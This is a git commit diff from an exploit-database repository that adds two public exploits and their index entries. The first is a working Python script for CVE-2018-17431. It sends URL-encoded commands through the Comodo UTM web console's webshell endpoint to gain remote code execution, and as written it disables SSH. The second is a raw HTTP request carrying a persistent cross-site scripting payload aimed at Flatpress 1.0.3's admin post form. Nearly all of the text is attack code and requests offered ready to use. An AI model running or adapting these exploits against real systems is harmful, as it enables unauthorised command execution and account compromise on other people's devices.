DB: 2020-09-23
2 changes to exploits/shellcodes Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security
parent
87f49d4427
commit
1a8b74a305
3 changed files with 86 additions and 0 deletions
50
exploits/multiple/webapps/48825.py
Executable file
50
exploits/multiple/webapps/48825.py
Executable file
|
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
|
||||
# Date: 2018-08-15
|
||||
# Exploit Author: Milad Fadavvi
|
||||
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
|
||||
# Vendor Homepage: https://www.comodo.com/
|
||||
# Version: Releases before 2.7.0 & 1.5.0
|
||||
# Tested on: Windows=Firefox/chrome - Kali=firefox
|
||||
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
|
||||
# CVE : CVE-2018-17431
|
||||
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
|
||||
# CVSS 3 score: 9.8
|
||||
|
||||
import requests
|
||||
|
||||
def RndInt(Lenght):
|
||||
from random import choice
|
||||
from string import digits
|
||||
|
||||
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
|
||||
return str(RandonInt)
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
IP = input("IP: ")
|
||||
Port = input("Port: ")
|
||||
|
||||
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
|
||||
'''For more info about command try to read manual of spesefic version of Comodo UTM and
|
||||
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
|
||||
'''
|
||||
|
||||
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
|
||||
BaseNComdURL = BaseURL + "&k=" + Command
|
||||
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
|
||||
FullURL = BaseNComdURL + LastPart
|
||||
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
|
||||
|
||||
try:
|
||||
FirstResponse = requests.get(FullURL).text
|
||||
except:
|
||||
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
|
||||
exit(1)
|
||||
|
||||
SecondResponse = requests.get(AddetionalEnter).text
|
||||
if SecondResponse.find("Configuration has been altered") == -1:
|
||||
print("\nExploit Failed!\n")
|
||||
exit(1)
|
||||
else:
|
||||
print("\nOK! Command Ran!\n")
|
||||
exit(0)
|
||||
34
exploits/php/webapps/48826.txt
Normal file
34
exploits/php/webapps/48826.txt
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
|
||||
# Google Dork: -
|
||||
# Date: 2020-09-19
|
||||
# Exploit Author: Alperen Ergel
|
||||
# Vendor Homepage: https://www.flatpress.org/
|
||||
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
|
||||
# Version: 1.0.3
|
||||
# Tested on: windows 10 / xampp
|
||||
# CVE : -
|
||||
|
||||
|
||||
# Proof Of Content
|
||||
|
||||
POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 223
|
||||
Origin: http://localhost/
|
||||
Connection: close
|
||||
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
|
||||
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS×tamp=1600526382&
|
||||
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue
|
||||
|
||||
|
||||
# Snipp
|
||||
|
||||
content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
|
||||
|
|
@ -40649,6 +40649,8 @@ id,file,description,date,author,type,platform,port
|
|||
48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
|
||||
48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
|
||||
48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
|
||||
48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
|
||||
48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue